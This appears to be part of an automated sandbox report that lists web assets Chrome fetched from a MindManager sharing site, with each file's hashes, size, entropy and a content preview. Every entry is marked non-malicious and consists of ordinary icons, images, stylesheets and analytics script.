                                                                SHA-512:48C548C335F57FFA9E8C82F5ADF5BE1357E98974D97D95F2B5A320DBA1D3FF2051214979A89C007D26C421509ED690E2009E4CC59C63D4C34D784EF0CF8D2283
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-hyperlinks-topic-link.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 17 14"><defs><style>.cls-1{fill:#444;}.cls-2{fill:#fff;}.cls-3{fill:#28559c;}</style></defs><title>2018 Publish - linktotopic</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><polygon class="cls-1" points="5.46 8.5 0.5 8.5 0.5 5.5 5.46 5.5 5.46 2.75 9.71 7 5.46 11.24 5.46 8.5"/><path class="cls-2" d="M6,4,9,7,6,10V8H1V6H6V4M5,1.55V5H0V9H5v3.45l1.71-1.71,3-3L10.41,7l-.71-.71-3-3L5,1.55Z"/><path class="cls-3" d="M3.5,13.5a2,2,0,0,1-2-2v-2h2v2h11v-9H3.5v2h-2v-2a2,2,0,0,1,2-2h11a2,2,0,0,1,2,2v9a2,2,0,0,1-2,2Z"/><path class="cls-2" d="M14.5,1A1.5,1.5,0,0,1,16,2.5v9A1.5,1.5,0,0,1,14.5,13H3.5A1.5,1.5,0,0,1,2,11.5V10H3v1.5a.5.5,0,0,0,.5.5h11a.5.5,0,0,0,.5-.5v-9a.5.5,0,0,0-.5-.5H3.5a.5.5,0,0,0-.5.5V4H2V2.5A1.5,1.5,0,0,1,3.5,1h11m0-1H3.5A2.5,2.5,0,0,0,1,2.5V5H4V3H14v8H4V9H1v2.5A2.5,2.5,0,0,0,3.5,14h11A2.5,2.5,0,0,0,17,11.5v-9A2.5,2.5,0,0,0,14.5,0Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):535
                                                                Entropy (8bit):5.202136798189186
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:CB826937596A126B45B7EE4CFB89EFBB
                                                                SHA1:0FB5DA72479199091F1AD723CF5C9EF9C613CC20
                                                                SHA-256:2586716274CAC384C36A7279BA7B453DFA606943894C03F345F29B54086935D9
                                                                SHA-512:568A263AD7FAF5B7099FB72E5E6B7832FE54D1AC35A1080364B544574C7EA5DC840243ADA85DFA67205C65BDCB3B96CED7345B97436525DC5831285FC809AED9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PercentageSVG/percentageDone07.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#2a6bac;}.cls-3{fill:#4197ff;}.cls-4{fill:#2979cd;}</style></defs><title>percentageDone07</title><circle class="cls-1" cx="8" cy="8" r="7.5"/><path class="cls-2" d="M8,1A7,7,0,1,1,1,8,7,7,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"/><path class="cls-3" d="M8,15.5a7.5,7.5,0,0,1-7.48-7h8v-8a7.5,7.5,0,0,1-.5,15Z"/><path class="cls-4" d="M9,1.07A7,7,0,1,1,1.07,9H9V1.07M8,0V8H0A8,8,0,1,0,8,0Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):944
                                                                Entropy (8bit):4.596297236445699
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:DD4AD91CFF500F56FC40ACB04FDE58C6
                                                                SHA1:712F2DCA958E4A4B8753719356202A1989F2E941
                                                                SHA-256:C5AEB40AEA1AE373E9EE051F0D094B98F4EE4CBC5DAD2B587F520E7B69A5D3EC
                                                                SHA-512:CF7EE2E329F5E11F99AD2F132225526A9E069B1565262DDD40FD79ACF91E37ED236BF2E39AD86B0A1EA3BB436F9D69956CFEDFE4FEAA257E4A72E306DBCC593F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/modern/topic_info_icon_link.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#528cc9;}</style></defs><title>topic_info_icon_link</title><path class="cls-1" d="M4.56,6A7.72,7.72,0,0,1,5.8,5.38a3.51,3.51,0,0,1,3.75.9A.9.9,0,0,1,8.79,7.8a1.31,1.31,0,0,1-.58-.28,1.87,1.87,0,0,0-2.62.07c-.85.85-1.7,1.69-2.54,2.55a1.84,1.84,0,1,0,2.61,2.6l1.2-1.2a.93.93,0,0,1,1.23-.18.91.91,0,0,1,.24,1.26s-1.71,1.71-1.75,1.74a3.6,3.6,0,0,1-3.75.48,9,9,0,0,1-.89-.52l-.47-.47a.83.83,0,0,0-.07-.13,3.59,3.59,0,0,1-.35-3.91c.13-.26.31-.49.46-.73Z"/><path class="cls-1" d="M11.26,9.73a7.72,7.72,0,0,1-1.24.65,3.51,3.51,0,0,1-3.75-.89A.91.91,0,0,1,7,8a1.31,1.31,0,0,1,.58.28,1.86,1.86,0,0,0,2.62-.07l2.55-2.54A1.85,1.85,0,1,0,10.16,3L9,4.22A.91.91,0,0,1,7.49,3.14a.11.11,0,0,1,0-.05L9.11,1.48l.13-.07A3.58,3.58,0,0,1,13,.93a7.86,7.86,0,0,1,.89.51l.47.47a.83.83,0,0,0,.07.13A3.6,3.6,0,0,1,14.77,6c-.13.26-.31.49-.46.73Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1115
                                                                Entropy (8bit):5.0271047665238315
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C2898D35537A28983FC40A77917DBC90
                                                                SHA1:CA87F6FF6C65142CC11F7A2283ED46091D108089
                                                                SHA-256:45D517E96F24E9AE8D6EEB79D5F8090D7ACB72A3EA86B8BAC6669446D6F89183
                                                                SHA-512:712F449FB7414B6C80E796898BAEF758EFE0B55951AE01121986C01AD48AAB5829503E3C2F395D5CAD7185A08750998689282CD6727443F8E87343EB85450088
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_copy.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><defs><style>.cls-1{fill:#fff;stroke:gray;stroke-miterlimit:10;}.cls-2{fill:#c9c9c9;}.cls-3{fill:#4f8ed4;}.cls-4{fill:gray;}</style></defs><title>web app toolbar assets copy</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_2-2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><rect class="cls-1" x="0.5" y="0.5" width="13" height="18" rx="2"/><rect class="cls-2" x="3" y="9" width="7" height="1" rx="0.5"/><rect class="cls-2" x="3" y="12" width="9" height="1" rx="0.5"/><rect class="cls-2" x="3" y="14" width="9" height="1" rx="0.5"/><rect class="cls-3" x="3" y="5" width="5" height="1" rx="0.5"/><path class="cls-1" d="M21.5,23.5h-9a2,2,0,0,1-2-2V7.5a2,2,0,0,1,2-2H18L23.5,11V21.5A2,2,0,0,1,21.5,23.5Z"/><rect class="cls-2" x="12" y="13" width="7" height="1" rx="0.5"/><rect class="cls-2" x="12" y="16" width="9" height="1" rx="0.5"/><rect class="cls-2" x="12" y="18" width="9" height="1" rx="0.5"/><rect class="cls-3" x="
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):512
                                                                Entropy (8bit):5.102065437395348
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A7853EA37FE757C56E09A4FAD3EC966A
                                                                SHA1:5BD0F03D214E33683B0776C2528B732F955EE9DD
                                                                SHA-256:50AE8877EB5C4209E37DBE6F4D7525284194E14270E6D6C15B4BC0BE3A144FEB
                                                                SHA-512:546826EC8D07012D66504B43FE4814C7079472390C9B800711BB649B77926F88B9D12D76918FDAA1251F9665BEFAA8D96FD963E1679609F81510A95D5FC6D913
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_redo.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 21.26 9.37"><defs><style>.cls-1{fill:#4f87c6;}</style></defs><title>context_redo</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M.4,9.37A11.43,11.43,0,0,1,6.73,6a11.31,11.31,0,0,1,3.68-.12c1.26.13,2.53.73,3.76.95l.12-4.37a12,12,0,0,0-4.75-.22A12.06,12.06,0,0,0,5.31,3.33,10,10,0,0,0,2.07,5.74,9.86,9.86,0,0,0,0,9.1Z"/><polygon class="cls-1" points="13.53 0 21.26 7.73 11.9 8.82 13.53 0"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):871
                                                                Entropy (8bit):5.140865820396106
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7A288CB592E88528971BEEE0E1CC42E8
                                                                SHA1:2A612EB5ABF7AE0050D6453734C07D1018077A0A
                                                                SHA-256:153BE7BF9FB7739B56DA2B86761D5B9455898613FB1B6A88A62D004F284D2EBE
                                                                SHA-512:0B2A881F224BAE072A9510D40125A94FD22DBD547D9D21329D5F2CD63F5EC40276DA1FE6656FCF8883BD2D5C947EDF507E179F0314E901B9E5131AEDFEDACE72
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PrioritiesSVG/roPriority04.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#febf00;}.cls-2{fill:#dd9505;}.cls-3{fill:#fff;}.cls-4{fill:gray;}</style></defs><title>roPriority04</title><rect class="cls-1" x="0.5" y="0.5" width="15" height="15" rx="0.5" ry="0.5"/><path class="cls-2" d="M15,1V15H1V1H15m0-1H1A1,1,0,0,0,0,1V15a1,1,0,0,0,1,1H15a1,1,0,0,0,1-1V1a1,1,0,0,0-1-1Z"/><path class="cls-2" d="M4,11V9.44L7.94,3H11V9h1v2H10v2H8V11ZM6,9H9V5H8a3.94,3.94,0,0,1-.33,1.22L6,8.52Z"/><path class="cls-3" d="M3,10V8.44L6.94,2H10V8h1v2H9v2H7V10ZM5,8H8V4H7a3.94,3.94,0,0,1-.33,1.22L5,7.52Z"/><path class="cls-4" d="M-.5,16.5v-4h1V11A1.5,1.5,0,0,1,2,9.5H3A1.5,1.5,0,0,1,4.5,11v1.5h1v4Z"/><path class="cls-3" d="M3,10a1,1,0,0,1,1,1v2H5v3H0V13H1V11a1,1,0,0,1,1-1H3M2,13H3V11H2v2M3,9H2a2,2,0,0,0-2,2v1H-1v5H6V12H5V11A2,2,0,0,0,3,9Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):376
                                                                Entropy (8bit):5.234067398408188
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:52FC7AD20AC7594557194D36A98870FF
                                                                SHA1:01946E428A1581763B1D06C9339C98F5FBED99D8
                                                                SHA-256:E0F5CB268964BB1B4F5C575322C4E1FEE095BDFCAB3A7748E443ECACFC86328E
                                                                SHA-512:1E378E684681639328CB1C17947ECB536A6E64F20C2B0215ECB4625800863CB0DB33010C67FDDF1298A0AC27AB395CDD699585E463E28B1EB7F50275204BD8D6
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/objects/parallelogram.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 12"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><polygon class="cls-1" points="0.64 11.5 3.39 0.5 15.36 0.5 12.61 11.5 0.64 11.5"/><path class="cls-2" d="M14.72,1l-2.5,10H1.28L3.78,1H14.72M16,0H3L0,12H13L16,0Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):56123
                                                                Entropy (8bit):4.204682317358813
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:67584A9F760A70827E68DACC6B33B674
                                                                SHA1:6AE6A52834818C4E086B466CEC0085273FB18336
                                                                SHA-256:582D2413CA6371E5E92FB5776C42A2906E73F67475CA98F25EDC5FE9620DEF00
                                                                SHA-512:D0DD09B27DC46E6E1A5FDFA6E92A1DCADD89559636207069F346915BBED8D7555942A6131999F22E74A43B10959A92FF6F5A0F7F984F54CFE9F86AAC4BF18FDC
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/banners/banner_education.svg
                                                                Preview:<svg width="650" height="180" viewBox="0 0 650 180" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_7595)">..<path d="M0 40.8984C0 35.3756 4.47715 30.8984 10 30.8984H640C645.523 30.8984 650 35.3756 650 40.8984V170.898C650 176.421 645.523 180.898 640 180.898H10C4.47715 180.898 0 176.421 0 170.898V40.8984Z" fill="#FFF3DC"/>..<path d="M595.338 123.328C607.419 106.969 609.204 85.3483 602.177 66.7406C595.151 48.1329 579.981 32.5222 561.702 21.8019C537.862 7.81972 507.311 1.83983 480.277 9.78833C453.243 17.7368 431.448 41.1442 431.702 66.7777C431.824 79.0968 437.76 92.222 449.904 97.8774C461.608 103.328 476.328 100.836 488.131 106.112C509.278 115.564 513.156 143.602 538.457 148.424C558.533 152.25 584.708 137.721 595.338 123.328Z" fill="#F8E3BC"/>..<path d="M461.155 143.594H548.847V22.4784L461.155 22.4784V143.594Z" fill="white" fill-opacity="0.35"/>..<path fill-rule="evenodd" clip-rule="evenodd" d="M549.522 143.595C549.522 143.967 549.22 144.27 548.847 144.27H461
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):49602
                                                                Entropy (8bit):7.881935507115631
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:DB783743CD246FF4D77F4A3694285989
                                                                SHA1:B9466716904457641B7831868B47162D8D378D41
                                                                SHA-256:5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
                                                                SHA-512:E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://btee.pradjoun.com/ijhSp3227HFrmhmULOYkfGSDZiRZqPvvJlaT2qklNVIilgjN7vjQhGgJL5XNj0U0oRLZyHDm12210
                                                                Preview:.PNG........IHDR...p..........{......sBIT....|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..*MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T....*.(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@*B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ*..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):428
                                                                Entropy (8bit):4.74408729636571
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:FA60F1770B3463C481860266D94C9400
                                                                SHA1:3E9783FD8B04B1855E2812E3AEC32BCC5A51F762
                                                                SHA-256:21C3771AE86DBA7659E7477B4DE0E7CA52178840D83266611678D80FBCAFBA77
                                                                SHA-512:93A408F049EE67EB45787A16747CB658E840896092423BBCFAA439D033AFDDDA1256C2A5FDD4B67C274CC065DD3DF2319D319443C8DA9B880939D293F853E6CF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/navigation-panel/mini-map-on.svg
                                                                Preview:<svg width="16" height="20" viewBox="0 0 16 20" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M15.0454 10.2564C13.6362 14 8.04667 20 8.04667 20C8.04667 20 2.27208 13.9998 1.01331 10.2564C0.422685 8.5 0.447608 6.68182 1.01298 5C1.6781 3.02149 3.90886 0 8.04667 0C12.1845 0 14.3934 3.04424 15.0454 5C15.5454 6.5 15.5454 8.75641 15.0454 10.2564Z" fill="#0067CB"/>.<circle cx="8.07959" cy="8" r="3" fill="white"/>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):26999
                                                                Entropy (8bit):4.299762814823017
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A17CC193EC7BE6CF406AB29EB0E01AF8
                                                                SHA1:0136F4B2F47A163D0A4A0F4C2C65031B35F65398
                                                                SHA-256:030A1708659ABB1F5D9AF4548424DF88CE070438683A1E61AD74F3200733FABD
                                                                SHA-512:D432D838844CDA8B1768B6CEF8D624F7F39A5BB40A4A0086C0956473F6BBE9A7C747C690A579446A243F4685DA90D924D04245C2BD738DA379930EA11BC5130F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/banners/banner_flowcharts.svg
                                                                Preview:<svg width="650" height="180" viewBox="0 0 650 180" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_9170)">..<path d="M0 40.8984C0 35.3756 4.47715 30.8984 10 30.8984H640C645.523 30.8984 650 35.3756 650 40.8984V170.898C650 176.421 645.523 180.898 640 180.898H10C4.47715 180.898 0 176.421 0 170.898V40.8984Z" fill="#FFDAC3"/>..<g clip-path="url(#clip1_456_9170)">..<g clip-path="url(#clip2_456_9170)">..<path d="M618.045 145.55C626.659 123.623 622.173 98.8945 608.732 80.1795C595.291 61.4645 573.634 48.5452 549.967 42.0298C519.099 33.5319 483.119 36.0008 455.252 53.0005C427.385 70.0003 410.015 102.727 417.985 131.335C421.815 145.083 432.393 157.99 447.677 160.677C462.408 163.267 478.132 156.065 492.921 158.43C519.418 162.666 532.165 192.878 561.921 190.687C585.532 188.949 610.465 164.843 618.045 145.55Z" fill="#F6C2A2"/>..<path d="M600.2 6.85156H440.412C433.357 6.85156 427.638 11.8619 427.638 18.0425V118.024C427.638 124.205 433.357 129.215 440.412 129.215H600.2C6
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (21778), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):21778
                                                                Entropy (8bit):4.769188103585108
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:73BC4067D312180A1B19A4D883F42D6A
                                                                SHA1:AD328A9A572FBEA43F295E7769835FF08F6FF1FD
                                                                SHA-256:D3F7B0EC4DE079928A999641E781E80F33597A392A561BC460276DFB4EFB6EEC
                                                                SHA-512:20B89462521684C258A8CE15E94DA67182C66397B0DE528357E01294FF06883C1AD96037A9D739E4575DB8722B1A1967578709A0C844CD45A49E6A51E1B6479D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:#onetrust-banner-sdk{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}#onetrust-banner-sdk .onetrust-vendors-list-handler{cursor:pointer;color:#1f96db;font-size:inherit;font-weight:bold;text-decoration:none;margin-left:5px}#onetrust-banner-sdk .onetrust-vendors-list-handler:hover{color:#1f96db}#onetrust-banner-sdk:focus{outline:2px solid #000;outline-offset:-2px}#onetrust-banner-sdk a:focus{outline:2px solid #000}#onetrust-banner-sdk #onetrust-accept-btn-handler,#onetrust-banner-sdk #onetrust-reject-all-handler,#onetrust-banner-sdk #onetrust-pc-btn-handler{outline-offset:1px}#onetrust-banner-sdk.ot-bnr-w-logo .ot-bnr-logo{height:64px;width:64px}#onetrust-banner-sdk .ot-tcf2-vendor-count.ot-text-bold{font-weight:bold}#onetrust-banner-sdk .ot-close-icon,#onetrust-pc-sdk .ot-close-icon,#ot-sync-ntfy .ot-close-icon{background-size:contain;background-repeat:no-repeat;background-position:center;height:12px;width:12px}#onetrust-banner-sdk .powered-by-logo,#onetrust-banner-sdk .ot-pc-fo
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (2343)
                                                                Category:downloaded
                                                                Size (bytes):52916
                                                                Entropy (8bit):5.51283890397623
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.google-analytics.com/analytics.js
                                                                Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows icon resource - 9 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                Category:downloaded
                                                                Size (bytes):165003
                                                                Entropy (8bit):2.916439733429721
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:6288E3BAFE5576EAAC15893CE3ED9359
                                                                SHA1:1F5B46CBDE606DA717ED6C912A407608B6B2E384
                                                                SHA-256:89E8A0214F242E7A5321DD5BB0F6C11279EDC545A994C6633938D1A5CA72BAE4
                                                                SHA-512:3E4121B6DF2F812628FC945C5635E869D71FFC12DCD801A8BD5432BA38EA6BBB34766A0DB7A6F3A29A4CF3536970366077C9C057F57D2FD226740F823C3858A2
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/ico/business-data-excel.ico
                                                                Preview:............ .5............. .(.......``.... .........HH.... ..T......@@.... .(B..#...00.... ..%..K@.. .... ......e........ ......v........ .h...#....PNG........IHDR.............\r.f....pHYs..........o.d....IDATx...Oh....._..6....U$9..`.j....454P....._..ns.a..:.{...m...!.c..!9d......v....2....1.;8r$......~..)v$..E......6x.....J?.z.........@1..(F..........#..b..P......@1..(F..........#..b..P......@1..(F..........#..b..P......@1..(F...~... .&.QI..t<!...I:..t<!gnL..kh.....dF.I.G.tt....p2#.XB.)G...9.OJ6...[....`......9o.A..@....._O..xRr.X... .....#....C|.....B.}...w...k.0. `....?....AG....1.(!..R...&.>.4...Sl.d........*...Sl.+....w>.@....Sl..H..v.m49...hA(..\:..@.....,.....rq...t .|_...?.....(..A@D......DV..&.}.......M.....9c.....M......c..P......@1..(F..........#..b\..O..1..6.]~............@1..(F..........#..b..P......@1..(F..........#..b..P......@1..(...T.......g..b..P......@1..(.,@.....fq............;[..BR.. v.!..T-.3.. `...[y..l.l...].'....!.M...O.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 51 x 48, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):1197
                                                                Entropy (8bit):7.713102182945504
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5A97D8D06CE85A9F800DA462D8611690
                                                                SHA1:9F7FB380B67943BCD2E5BD6D3761EAC80043B263
                                                                SHA-256:9E386D38C2A156655666EF24B7DE664C46D07488DFFCB093A81A71C0A8278467
                                                                SHA-512:EDF3C1074BE4B12374C61152C16C2EFBB6AE6BCEF191BFAEEE5C1DA6346CE3F530D5F66BB618A74ADA83D435D3A57F78B3ADD34070B5F9BF8D5F6184B1245162
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-align-left-disabled.png
                                                                Preview:.PNG........IHDR...3...0......5B.....bKGD..............pHYs.................tIME.......`I.^...:IDATh..ZKk]U.^.}..........{.@zo..!.)8S.-b..C.)B...g.. ....E4I...I..y.B....b....s..k9..>n.8...]pFgm...[k}.c...B....!........A......'I..1."fz..w.,#U..X ..._...5%.px...P.0....".6....x".#.........C .K.#b.4.DcqW.E>O..."..3e.*..@@e.Mj.9A..I........\.4......I..8=..#..2.]..1.P........2....mQ...G.PM.,.v..........j._.....8...\..i7z.N.,:3{.4>.jO...(..5$.DH'...`.[...^h.P|.wWv....z...9.I....{.3...W..........33.3..g.\.9.Y...>.N...x_<.b....=.Y.......,*.UCj.....>.f,......D..|bh..........sYA...IZ.".o..f..?Hk.]..l.A.(4..\.^..7.....9k...yX..Q.mU--.$".x.5pu|z.F..7'.M.....sT.f7v4....^.k...4Tb. )2.tZ.?......^.E.T.>-...&.$=E...6/._.$..|.....00.*.L.....N.._&f..w.....C.{.......7.q.......U..4...`v.5.D...,. ....7.\..2q..Yf..d....Wh..W...g+{4F50(oC3@@#bN....r..n...fH4/.9DDMU.5.{.N-.<.".y.Z.-`V..6..=;.......j.#..@.i7?....W5ksl..mj.V.T.....`.5.qXU./G..#....j...,....O....s....>0.2.-bA.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):241
                                                                Entropy (8bit):5.049600229951074
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8EE46138909F08E672EFD61A2FFA3B63
                                                                SHA1:AB199EB2A140BCEB802E248D2D87CAAD4BA1A895
                                                                SHA-256:45AD35B0AE51227CB9ECAF7C3E35CE9BD858EE08F323DAE4A683D5FE04FB6EF1
                                                                SHA-512:EC5A665BA6E30AC52A18787860C25BBB36AC804DF818C9E4D0B8FAF1968E7BBCAB1BBD11EB27424E733BF55EDB757F103081411B6A5BAA17EB8273994E195CC3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/marker-1.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#1c97e6;}</style></defs><title>heart_blue_16 copy</title><polygon class="cls-1" points="0 0 8 0 16 8 8 16 0 16 0 0"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 51 x 48, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):1129
                                                                Entropy (8bit):7.668154662505682
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:E521083C5EF064239380D5EB8CE9D168
                                                                SHA1:F0FB6F3EE0034EEB4ABDAD289A293A617153886F
                                                                SHA-256:29773881BA5D78480F7CB94CE44C739165EF7F2EA4DDC71C41CCFC2B47F7FA98
                                                                SHA-512:4139692E1325703B1B7742FA6EB2CF118768E2BEDF01A9A5D56543D470CEB86CB8C8A6929F37E0B8AEA3D634D7ED6D0817D6B4C39BD01E0F9FA539807F4B1E41
                                                                Malicious:false
                                                                Reputation:unknown
